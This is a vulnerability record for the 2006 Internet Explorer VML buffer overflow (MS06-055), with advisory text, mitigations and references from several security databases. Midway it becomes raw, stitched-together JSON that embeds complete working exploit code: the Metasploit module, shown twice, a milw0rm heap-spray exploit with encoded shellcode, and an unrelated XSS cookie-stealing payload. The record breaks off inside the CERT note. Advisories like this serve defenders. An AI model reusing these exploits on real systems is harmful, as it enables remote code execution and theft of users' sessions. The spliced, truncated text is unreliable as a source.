Microsoft Internet Explorer Vector Markup Language Buffer Overflow Vulnerability
2006-09-19T00:00:00
ID: SMNTC-20096 | Type: symantec | Reporter: Symantec Security Response | Modified: 2006-09-19T00:00:00
Description

Microsoft Internet Explorer is prone to a buffer-overflow vulnerability that arises because of an error in the processing of Vector Markup Language documents. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. The method currently used to exploit this issue will typically terminate Internet Explorer. This vulnerability is currently being exploited in the wild as 'Trojan.Vimalov'. This vulnerability affects Internet Explorer version 6.0 on a fully patched system. Previous versions may also be affected.

Update: Microsoft Outlook 2003 is also an attack vector for this issue, since it uses Internet Explorer to render HTML email. Reportedly, attacks are possible even when active scripting has been disabled for email viewing.

Technologies Affected
Avaya Modular Messaging (MAS) 3.0.0
Avaya Modular Messaging (MAS)
Avaya S8100 Media Servers
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R9
HP Storage Management Appliance 2.1
Microsoft Internet Explorer 5.0.1 SP4
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Outlook 2003
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP4
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP
Microsoft Windows XP Home
Microsoft Windows XP Home SP1
Microsoft Windows XP Home SP2
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Professional
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition SP2
Recommendations

Run all software as a nonprivileged user with minimal access rights.
Ensure that all non-administrative tasks, such as browsing the web and reading email, are performed as an unprivileged user with minimal access rights.

Do not follow links provided by unknown or untrusted sources.
Users should never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.

Set web browser security to disable the execution of script code or active content.
Disabling scripting and active content in the Internet Zone may limit exposure to this and other vulnerabilities. Note that, as described above, attacks through HTML email have reportedly succeeded even with active scripting disabled, so this setting alone should not be relied on for this issue.

Modify default configuration files to disable any unwanted behavior.
Configure email client applications to display email as plaintext only. This will limit the possibility of email-based attacks.

Microsoft has released advisory MS06-055 to address this issue. Please see the referenced advisory for details on obtaining and applying the appropriate updates. Note: A third-party, temporary fix is available from the Zeroday Emergency Response Team (ZERT). Symantec has not verified this fix; Microsoft does not support it. Please see the references for more information.
Identifiers

CVE: CVE-2006-4868, CVE-2006-4668 (the latter is listed in this record's CVE list, but its NVD description, given under Related records below, concerns a different product)
BID: 20096
CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Source: https://www.symantec.com/security_response/vulnerability.jsp?bid=20096

References

http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx
http://www.microsoft.com/technet/security/advisory/925568.mspx
http://www.kb.cert.org/vuls/id/416092
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-091914-1801-99&tabid=1
http://isotf.org/zert/
http://isotf.org/zert/papers/vml-details-20060928.pdf
http://zert.isotf.org/papers/vml-details-20060928.pdf
http://eeyeresearch.typepad.com/blog/2006/09/yet_another_int.html
http://blogs.securiteam.com/index.php/archives/624
http://blogs.securiteam.com/?p=640
http://msinfluentials.com/blogs/jesper/archive/2006/09/22/More-options-on-protecting-against-the-VML-vulnerability-on-a-domain.aspx
http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html
http://sunbeltblog.blogspot.com/2006/09/javascript-no-longer-valid-mitigation.html
http://www.websense.com/securitylabs/blog/blog.php?BlogID=80
http://www.eweek.com/article2/0,1895,2019162,00.asp
http://news.portalit.net/fullnews_The-VML-Flaw-Harms-Outlook-2003-As-Well_2054.html
http://blogs.pandasoftware.com/blogs/images/PandaLabs/2007/05/11/MPack.pdf
https://www.immunityinc.com/downloads/immpartners/SALVO_01.tar.gz
https://www.immunityinc.com/downloads/immpartners/SALVO.tar.gz
http://sf-freedom.blogspot.com/
http://www.microsoft.com/windows/ie/

Related identifiers in other databases: CERT VU#416092, Nessus SMB_NT_MS06-055.NASL, OSVDB 28611 and 28946, Exploit-DB 2425, 16597 and 28494, Metasploit exploit/windows/browser/ms06_055_vml_method, CANVAS MS06_055, Packet Storm 83194, SecurityVulns DOC:14434.
Related records

CVE-2006-4868 (NVD, published 2006-09-19, CVSS 9.3, AV:N/AC:M/Au:N/C:C/I:C/A:C): Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4868

CVE-2006-4668 (NVD, published 2006-09-09, CVSS 4.3, AV:N/AC:M/Au:N/C:N/I:P/A:N): Cross-site scripting (XSS) vulnerability in index.php in Rob Hensley AckerTodo 4.0 allows remote attackers to inject arbitrary web script or HTML via the task_id parameter in an edit_task command. https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4668

SAINT exploit record "Internet Explorer VML rect fill buffer overflow" (added 09/20/2006; CVE-2006-4868, BID 20096, OSVDB 28946; the same record appears three times in the source under ids SAINT:9F72B0CFF58AD7A47199484386986BB7, SAINT:580A16A959FD7F0F499A49F545FE25DC and SAINT:6A37B01591A310C332C01DD4BCA3324B):
Background: Vector Markup Language (VML) is an XML-based format for vector graphics (http://msdn.microsoft.com/en-us/library/bb250524.aspx).
Problem: A buffer overflow in Internet Explorer when processing VML code allows remote command execution using a long fill parameter within a rect tag.
Resolution: http://www.microsoft.com/technet/security/advisory/925568.mspx
References: http://www.us-cert.gov/cas/techalerts/TA06-262A.html
Limitations: Exploit works on Internet Explorer 6.0 and requires a user to load the exploit page in a vulnerable browser. There may be a delay before the exploit succeeds due to the large amount of memory required on the target.
Platforms: Windows
https://my.saintcorporation.com/cgi-bin/exploit_info/ie_vml_rect_fill

Exploit-DB record: Internet Explorer VML Fill Method Code Execution. CVE-2006-4868.
Remote exploit for windows platform", "modified": "2010-07-03T00:00:00", "published": "2010-07-03T00:00:00", "id": "EDB-ID:16597", "href": "https://www.exploit-db.com/exploits/16597/", "type": "exploitdb", "title": "Microsoft Internet Explorer - VML Fill Method Code Execution", "sourceData": "##\r\n# $Id: ms06_055_vml_method.rb 9669 2010-07-03 03:13:45Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Internet Explorer VML Fill Method Code Execution',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer using\r\n\t\t\t\ta buffer overflow in the VML processing code (VGX.dll). This module has been tested on\r\n\t\t\t\tWindows 2000 SP4, Windows XP SP0, and Windows XP SP2.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'hdm',\r\n\t\t\t\t\t'Aviv Raff <avivra [at] gmail.com>',\r\n\t\t\t\t\t'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>',\r\n\t\t\t\t\t'Mr.Niega <Mr.Niega [at] gmail.com>',\r\n\t\t\t\t\t'M. 
Shirk <shirkdog_list [at] hotmail.com>'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9669 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2006-4868' ],\r\n\t\t\t\t\t['OSVDB', '28946' ],\r\n\t\t\t\t\t['MSB', 'MS06-055' ],\r\n\t\t\t\t\t['BID', '20096' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Windows NT 4.0 -> Windows 2003 SP1', {'Ret' => 0x0c0c0c0c} ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Sep 19 2006'))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\t# Re-generate the payload\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\r\n\t\t# Determine the buffer length to use\r\n\t\tbuflen = 1024\r\n\t\tif (request.headers['User-Agent'] =~ /Windows 5\\.[123]/)\r\n\t\t\tbuflen = 65535\r\n\t\tend\r\n\r\n\t\t# Encode the shellcode\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Get a unicode friendly version of the return address\r\n\t\taddr_word = [target.ret].pack('V').unpack('H*')[0][0,4]\r\n\r\n\t\t# Select a random VML element to use\r\n\t\tvmls = %w{ rect roundrect line polyline oval image arc curve }\r\n\t\tvmlelem = vmls[ rand(vmls.length) ]\r\n\r\n\t\t# The overflow buffer for the method attribute\r\n\t\tbuffer = (\"&#x\" + addr_word + \";\") * buflen\r\n\r\n\t\t# Generate a random XML namespace for VML\r\n\t\txmlns = rand_text_alpha(rand(30)+2)\r\n\r\n\t\t# Randomize the javascript variable names\r\n\t\tvar_buffer = rand_text_alpha(rand(30)+2)\r\n\t\tvar_shellcode = rand_text_alpha(rand(30)+2)\r\n\t\tvar_unescape = rand_text_alpha(rand(30)+2)\r\n\t\tvar_x = rand_text_alpha(rand(30)+2)\r\n\t\tvar_i = rand_text_alpha(rand(30)+2)\r\n\r\n\t\t# Build out the message\r\n\t\tcontent = %Q|\r\n<html xmlns:#{xmlns} = \" urn:schemas-microsoft-com:vml \" >\r\n<head>\r\n<style> 
#{xmlns}\\\\:* { behavior: url(#default#VML) ; } </style>\r\n<body>\r\n<script>\r\n\r\n\tvar #{var_unescape} = unescape ;\r\n\tvar #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ;\r\n\r\n\tvar #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ;\r\n\twhile (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;\r\n\r\n\tvar #{var_x} = new Array() ;\r\n\tfor ( var #{var_i} =0 ; #{var_i} < 30 ; #{var_i}++ ) {\r\n\t\t#{var_x}[ #{var_i} ] =\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\r\n\t\t\t#{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;\r\n\t}\r\n\r\n</script>\r\n<#{xmlns}:#{vmlelem}>\r\n\t<#{xmlns}:fill method = \"#{buffer}\" />\r\n</#{xmlns}:#{vmlelem}>\r\n\r\n</body>\r\n</html>\r\n\t\t|\r\n\r\n\t\tcontent = Rex::Text.randomize_space(content)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\t# Transmit the response to the client\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16597/"}, {"lastseen": "2016-02-03T08:17:16", "bulletinFamily": "exploit", "description": "AckerTodo 4.0 Index.PHP Cross-Site Scripting Vulnerability. CVE-2006-4668. 
Webapps exploit for php platform", "modified": "2006-09-07T00:00:00", "published": "2006-09-07T00:00:00", "id": "EDB-ID:28494", "href": "https://www.exploit-db.com/exploits/28494/", "type": "exploitdb", "title": "AckerTodo 4.0 Index.PHP Cross-Site Scripting Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/19894/info\r\n\r\nAckerTodo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.\r\n\r\nExploiting this issue would allow an attacker to steal cookie-based credentials and to launch other attacks.\r\n\r\nVersion 4.0 is vulnerable; other versions may also be affected.\r\n\r\nindex.php?cmd=edit_task&task_id=\"><script>document.write(document.cookie);</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/28494/"}, {"lastseen": "2016-01-31T16:14:02", "bulletinFamily": "exploit", "description": "MS Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2). CVE-2006-3866,CVE-2006-4868. 
Remote exploit for windows platform", "modified": "2006-09-24T00:00:00", "published": "2006-09-24T00:00:00", "id": "EDB-ID:2425", "href": "https://www.exploit-db.com/exploits/2425/", "type": "exploitdb", "title": "Microsoft Internet Explorer VML Remote Buffer Overflow Exploit XP SP2", "sourceData": "<!--\r\n\r\n..::[ jamikazu presents ]::..\r\n\r\nMicrosoft Internet Explorer VML Remote Buffer Overflow Exploit (0day)\r\nWorks on all Windows XP versions including SP2\r\n\r\nAuthor: jamikazu \r\nMail: jamikazu@gmail.com\r\n\r\nCredit: metasploit, SkyLined\r\n\r\ninvokes calc.exe if successful \r\n\r\n\r\n-->\r\n\r\n<html xmlns:v=\"urn:schemas-microsoft-com:vml\">\r\n\r\n<head>\r\n<object id=\"VMLRender\" classid=\"CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E\">\r\n</object>\r\n<style>\r\nv\\:* { behavior: url(#VMLRender); }\r\n</style>\r\n</head>\r\n\r\n<body>\r\n\r\n<SCRIPT language=\"javascript\">\r\n\r\n\tvar heapSprayToAddress = 0x05050505;\r\n\r\n\tvar payLoadCode = unescape(\"%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063\");\r\n\r\n\tvar heapBlockSize = 0x400000;\r\n\r\n\tvar payLoadSize = payLoadCode.length * 2;\r\n\r\n\tvar spraySlideSize = heapBlockSize - (payLoadSize+0x38);\r\n\r\n\tvar spraySlide = unescape(\"%u9090%u9090\");\r\n\tspraySlide = getSpraySlide(spraySlide,spraySlideSize);\r\n\r\n\theapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;\r\n\r\n\tmemory = new Array();\r\n\r\n\tfor (i=0;i<heapBlocks;i++)\r\n\t{\r\n\t\tmemory[i] = spraySlide + payLoadCode;\r\n\t}\r\n\r\n\r\n\r\n\tfunction getSpraySlide(spraySlide, spraySlideSize)\r\n\t{\r\n\t\twhile 
(spraySlide.length*2<spraySlideSize)\r\n\t\t{\r\n\t\t\tspraySlide += spraySlide;\r\n\t\t}\r\n\t\tspraySlide = spraySlide.substring(0,spraySlideSize/2);\r\n\t\treturn spraySlide;\r\n\t}\r\n\r\n</script> \r\n<v:rect style='width:120pt;height:80pt' fillcolor=\"red\">\r\n<v:fill method = \"\" ></v:rect></v:fill></body>\r\n</html>\r\n \n# milw0rm.com [2006-09-24]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2425/"}], "metasploit": [{"lastseen": "2019-12-03T12:51:23", "bulletinFamily": "exploit", "description": "This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). 
This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n", "modified": "2017-07-24T13:26:21", "published": "2006-09-27T03:52:54", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS06_055_VML_METHOD", "href": "", "type": "metasploit", "title": "MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution',\n 'Description' => %q{\n This module exploits a code execution vulnerability in Microsoft Internet Explorer using\n a buffer overflow in the VML processing code (VGX.dll). This module has been tested on\n Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm',\n 'Aviv Raff <avivra[at]gmail.com>',\n 'Trirat Puttaraksa (Kira) <trir00t[at]gmail.com>',\n 'Mr.Niega <Mr.Niega[at]gmail.com>',\n 'M. 
Shirk <shirkdog_list[at]hotmail.com>'\n ],\n 'References' =>\n [\n ['CVE', '2006-4868'],\n ['OSVDB', '28946'],\n ['MSB', 'MS06-055'],\n ['BID', '20096'],\n ],\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows NT 4.0 -> Windows 2003 SP1', {'Ret' => 0x0c0c0c0c} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Sep 19 2006'))\n end\n\n def on_request_uri(cli, request)\n\n # Re-generate the payload\n return if ((p = regenerate_payload(cli)) == nil)\n\n # Determine the buffer length to use\n buflen = 1024\n if (request.headers['User-Agent'] =~ /Windows 5\\.[123]/)\n buflen = 65535\n end\n\n # Encode the shellcode\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Get a unicode friendly version of the return address\n addr_word = [target.ret].pack('V').unpack('H*')[0][0,4]\n\n # Select a random VML element to use\n vmls = %w{ rect roundrect line polyline oval image arc curve }\n vmlelem = vmls[ rand(vmls.length) ]\n\n # The overflow buffer for the method attribute\n buffer = (\"&#x\" + addr_word + \";\") * buflen\n\n # Generate a random XML namespace for VML\n xmlns = rand_text_alpha(rand(30)+2)\n\n # Randomize the javascript variable names\n var_buffer = rand_text_alpha(rand(30)+2)\n var_shellcode = rand_text_alpha(rand(30)+2)\n var_unescape = rand_text_alpha(rand(30)+2)\n var_x = rand_text_alpha(rand(30)+2)\n var_i = rand_text_alpha(rand(30)+2)\n\n # Build out the message\n content = %Q|\n<html xmlns:#{xmlns} = \" urn:schemas-microsoft-com:vml \" >\n<head>\n<style> #{xmlns}\\\\:* { behavior: url(#default#VML) ; } </style>\n<body>\n<script>\n\n var #{var_unescape} = unescape ;\n var #{var_shellcode} = #{var_unescape}( \"#{shellcode}\" ) ;\n\n var #{var_buffer} = #{var_unescape}( \"%u#{addr_word}\" ) ;\n while (#{var_buffer}.length <= 0x400000) #{var_buffer}+=#{var_buffer} ;\n\n var #{var_x} = new Array() ;\n for ( var #{var_i} =0 ; #{var_i} < 30 ; 
#{var_i}++ ) {\n #{var_x}[ #{var_i} ] =\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} +\n #{var_buffer}.substring( 0 , 0x100000 - #{var_shellcode}.length ) + #{var_shellcode} ;\n }\n\n</script>\n<#{xmlns}:#{vmlelem}>\n <#{xmlns}:fill method = \"#{buffer}\" />\n</#{xmlns}:#{vmlelem}>\n\n</body>\n</html>\n |\n\n content = Rex::Text.randomize_space(content)\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms06_055_vml_method.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "description": "**Name**| ms06_055 \n---|--- \n**CVE**| CVE-2006-4868 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Internet Explorer Vector Markup Language Overflow \n**Notes**| CVE Name: CVE-2006-4868 \nVENDOR: Microsoft \nMSADV: MS06-055 \nVersionsAffected: \nRepeatability: Infinite \nReferences: http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4868 \nDate public: 09/26/06 \nCVSS: 9.3 \n\n", "modified": "2006-09-19T19:07:00", "published": "2006-09-19T19:07:00", "id": "MS06_055", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_055", "title": "Immunity Canvas: MS06_055", "type": "canvas", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2019-10-09T19:51:24", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Internet Explorer 
([_IE_](<http://www.microsoft.com/windows/ie/default.mspx>)) fails to properly handle Vector Markup Language tags. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft IE version 5.0 and higher supports the Vector Markup Language [(VML](<http://msdn.microsoft.com/workshop/author/vml/SHAPE/introduction.asp>)), which is a set of XML tags for drawing vector graphics. IE fails to properly handle malformed VML tags allowing a stack buffer overflow to occur. If a remote attacker can persuade a user to access a specially crafted web page with IE, that attacker may be able to trigger the buffer overflow. In addition, an attacker could deliver an HTML email message or entice a user to select an HTML document in Windows Explorer. \n\nOn Windows XP SP2 systems the vulnerable component (VGX.DLL) is compiled with the[ /GS](<http://msdn2.microsoft.com/en-US/library/8dbf701c.aspx>) (Buffer Security Check) flag. However, exploits using techniques to circumvent the Buffer Security Check are publicly available. \n \nNote that this vulnerability is actively being exploited. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker can execute arbitrary code on a vulnerable system. \n \n--- \n \n### Solution \n\n**Apply the update from Microsoft**\n\nMicrosoft addresses this vulnerability with the update listed in Microsoft Security Bulletin [MS06-055](<http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx>). 
\n \n--- \n \nUntil the update can be applied, consider the following workarounds:\n\n \n**Disable VML support** \n \nMicrosoft Security Advisory ([925568](<http://www.microsoft.com/technet/security/advisory/925568.mspx>)) suggests the following techniques to disable VML support: \n\n\n * Un-register Vgx.dll on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1\n * Modify the Access Control List on Vgx.dll to be more restrictive\n * Configure Internet Explorer 6 for Microsoft Windows XP Service Pack 2 to disable Binary and Script Behaviors in the Internet and Local Intranet security zone\n\n**Do not follow unsolicited links** \n \nIn order to convince users to visit their sites, attackers often use URL encoding, IP address variations, long URLs, intentional misspellings, and other techniques to create misleading links. Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n \n**Disable Active Scripting** \n \nAlthough this vulnerability does not require Active Scripting to be enabled, known exploits targeting this issue use Active Scripting to place malicious code on a vulnerable system. To block this attack vector, it is recommended that Active Scripting be disabled. 
For instructions on how to disable Active Scripting in Microsoft Internet Explorer, please refer to the Internet Explorer section of the [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>) document. \n \n**Read and send email in plain text format** \n \nAn attacker may be able to exploit this vulnerability by convincing a user to open a specially crafted HTML email. Only reading email in plaintext will prevent exploitation of this vulnerability through email. Consider the security of fellow Internet users and send email in plain text format when possible. \n \nIf you use Microsoft Outlook, we encourage you to apply the Outlook Email Security Update. The update configures Outlook to open email messages in the Restricted Sites Zone, where Active scripting is disabled by default. In addition, the update provides further protection against malicious code that attempts to propagate via Outlook. The Outlook Email Security Update is available for [Outlook 98](<http://office.microsoft.com/downloads/9798/Out98sec.aspx>) and [Outlook 2000](<http://office.microsoft.com/downloads/2000/Out2ksec.aspx>). The functionality of the Outlook Email Security Update is included in Outlook 2002 and Outlook Express 6. Outlook 2003 includes these and other security enhancements. \n \n**Configure Windows Explorer to use Windows Classic Folders** \n \nWhen Windows Explorer is configured to use the \"Show common tasks in folders\" option, HTML within a file may be processed when that file is selected. If the \"Show common tasks in folders\" is enabled, selecting a specially crafted HTML document in Windows Explorer may trigger this vulnerability. Note that the \"Show common tasks in folders\" is enabled by default. To mitigate this attack vector, enable the \"Use Windows classic folders\" option. 
To enable this option in Windows Explorer: \n\n\n * Open Windows Explorer\n * Select Folder Options from the Tools menu\n * Select the \"Use Windows classic folders\" option in the Tasks section \n--- \n \n### Vendor Information\n\n416092\n\n### Microsoft Corporation\n\nUpdated: September 27, 2006 \n\n### Status\n\nVulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.microsoft.com/technet/security/advisory/925568.mspx> and <http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23416092 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/Bulletin/MS06-055.mspx>\n * <http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.html>\n * <http://msdn.microsoft.com/workshop/author/vml/SHAPE/introduction.asp>\n * <http://www.microsoft.com/technet/security/advisory/925568.mspx>\n\n### Acknowledgements\n\nThis vulnerability was reported by Sunbelt Software.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-4868](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4868>) \n---|--- \n**Severity Metric:** | 46.28 \n**Date Public:** | 2006-09-18 \n**Date First Published:** | 2006-09-19 \n**Date Last 
